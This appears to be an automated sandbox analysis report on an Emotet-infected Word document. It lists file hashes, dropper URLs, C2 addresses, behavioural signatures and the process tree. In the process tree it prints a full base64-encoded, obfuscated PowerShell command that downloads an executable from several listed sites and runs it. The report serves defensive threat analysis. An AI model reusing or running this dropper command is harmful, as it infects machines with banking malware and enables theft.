Overview

overview

10

Static

static

8

emotet_e3_...oc.doc

windows7_x64

10

emotet_e3_...oc.doc

windows10_x64

10

Analysis

  • max time kernel
    74s
  • max time network
    143s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    31-07-2020 22:59

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    emotet_e3_31e71057741f6f610cdef83cb8a39857f613c393f266b4e04553c7b9ef80369a_2020-07-31__225902._doc.doc

  • Size

    174KB

  • MD5

    50d4fd2fa1c4dba71d89f28aa57f4204

  • SHA1

    1846f2282aae187ac0d0c4862497ed5b74192383

  • SHA256

    31e71057741f6f610cdef83cb8a39857f613c393f266b4e04553c7b9ef80369a

  • SHA512

    cba3e83939e195b32f6f953fa9518b6f6563f1c0ca7cb33c0c9f14e55002cf81aaeaf3d1162e1e6b39391d3aed50469c04ffe93597a72ba8872cd8df69c6de81

Score
10/10
trojanbankeremotet

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://prolicitar.com.br/privilege/VwWMjYDU/
exe.dropper

http://proreclame.nl/assets/Riw/
exe.dropper

http://www.meltonian.net/Blog/Zaviixl730/
exe.dropper

http://www.mollymoody.com/iRVKRMq/
exe.dropper

https://mwrouse.com/cs2300/qVJaPCy/

Extracted

Family

emotet

C2

187.64.128.197:80

198.57.203.63:8080

163.172.107.70:8080

212.112.113.235:80

157.7.164.178:8081

181.167.35.84:80

212.156.133.218:80

185.142.236.163:443

181.143.101.19:8080

75.127.14.170:8080

115.165.3.213:80

190.55.233.156:80

139.59.12.63:8080

144.139.91.187:80

37.70.131.107:80

181.113.229.139:443

41.185.29.128:8080

177.37.81.212:443

5.79.70.250:8080

78.188.170.128:80
rsa_pubkey.plain

Signatures

  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Drops file in System32 directory 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 2 IoCs
  • Emotet Payload 4 IoCs

    Detects Emotet payload in memory.

  • Modifies registry class 280 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

    trojanbankeremotet

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\emotet_e3_31e71057741f6f610cdef83cb8a39857f613c393f266b4e04553c7b9ef80369a_2020-07-31__225902._doc.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Suspicious behavior: AddClipboardFormatListener
    • Modifies registry class
    PID:1492
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JABWAE0AQgBBAE8AaABvAHcAPQAnAEEASgBEAFEAUwBrAHMAdQAnADsAWwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAIgBzAGUAYwBVAGAAUgBJAGAAVAB5AHAAYABSAE8AVABPAGMAYABPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABIAFAATABCAEkAYQB6AGcAIAA9ACAAJwA3ADUAMQAnADsAJABNAEwASgBUAFoAeQB4AGgAPQAnAFcATABMAFkATQBkAGUAZgAnADsAJABXAEgATgBDAFcAYwBqAHIAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEgAUABMAEIASQBhAHoAZwArACcALgBlAHgAZQAnADsAJABWAFQARgBOAEEAdwBqAGkAPQAnAFEAVwBBAEoATgBoAHAAdAAnADsAJABIAFcAVQBTAEMAcgBxAGEAPQAuACgAJwBuAGUAdwAnACsAJwAtAG8AYgBqAGUAJwArACcAYwB0ACcAKQAgAE4ARQB0AC4AdwBlAGIAQwBsAGkARQBuAHQAOwAkAFAASQBMAEQAUQBzAGYAeAA9ACcAaAB0AHQAcAA6AC8ALwBwAHIAbwBsAGkAYwBpAHQAYQByAC4AYwBvAG0ALgBiAHIALwBwAHIAaQB2AGkAbABlAGcAZQAvAFYAdwBXAE0AagBZAEQAVQAvACoAaAB0AHQAcAA6AC8ALwBwAHIAbwByAGUAYwBsAGEAbQBlAC4AbgBsAC8AYQBzAHMAZQB0AHMALwBSAGkAdwAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AZQBsAHQAbwBuAGkAYQBuAC4AbgBlAHQALwBCAGwAbwBnAC8AWgBhAHYAaQBpAHgAbAA3ADMAMAAvACoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAG0AbwBsAGwAeQBtAG8AbwBkAHkALgBjAG8AbQAvAGkAUgBWAEsAUgBNAHEALwAqAGgAdAB0AHAAcwA6AC8ALwBtAHcAcgBvAHUAcwBlAC4AYwBvAG0ALwBjAHMAMgAzADAAMAAvAHEAVgBKAGEAUABDAHkALwAnAC4AIgBzAGAAUABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAE0AUwBCAEIAUQBhAHoAegA9ACcATwBMAFEATgBPAGYAdgB5ACcAOwBmAG8AcgBlAGEAYwBoACgAJABZAFQATQBYAFQAZQB6AHMAIABpAG4AIAAkAFAASQBMAEQAUQBzAGYAeAApAHsAdAByAHkAewAkAEgAVwBVAFMAQwByAHEAYQAuACIARABgAG8AVwBuAGwATwBBAGAARABmAGkAYABMAEUAIgAoACQAWQBUAE0AWABUAGUAegBzACwAIAAkAFcASABOAEMAVwBjAGoAcgApADsAJABFAFkATABOAEsAcgBpAGgAPQAnAE8ATgBYAEUASgB0AHAAcgAnADsASQBmACAAKAAoACYAKAAnAEcAJwArACcAZQB0ACcAKwAnAC0ASQB0AGUAbQAnACkAIAAkAFcASABOAEMAVwBjAGoAcgApAC4AIgBMAGUAYABOAEcAdABoACIAIAAtAGcAZQAgADIAOQA2ADAANAApACAAewAoAFsAdwBtAGkAYwBsAGEAcwBzAF0AJwB3AGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzACcAKQAuACIAQwBSAEUAYABBAHQAZQAiACgAJABXAEgATgBDAFcAYwBqAHIAKQA7ACQAVQBEAEYATwBBAGIAdQB3AD0AJwBEAEgAVgBPAFAAZwBrAHUAJwA7AGIAcgBlAGEAawA7ACQAWQBJAEsAUwBKAG8AawBtAD0AJwBKAEMAWABYAFcAdAB6AGUAJwB9AH0AYwBhAHQAYwBoAHsAfQB9ACQAWQBLAEsATABQAHUAagBkAD0AJwBUAFoASQBYAFkAeQBsAHMAJwA=
    1⤵
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    PID:1684
  • C:\Users\Admin\751.exe
    C:\Users\Admin\751.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1308
    • C:\Windows\SysWOW64\svchost\KBDCZ.exe
      "C:\Windows\SysWOW64\svchost\KBDCZ.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      PID:1932

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1308-10-0x00000000001E0000-0x00000000001EC000-memory.dmp

    Filesize

    48KB

    Download

  • memory/1492-2-0x0000000008940000-0x0000000008944000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1492-6-0x000000000AAB0000-0x000000000AAB4000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1492-7-0x000000000BB30000-0x000000000BB34000-memory.dmp

    Filesize

    16KB

    Download

  • memory/1932-14-0x0000000000320000-0x000000000032C000-memory.dmp

    Filesize

    48KB

    Download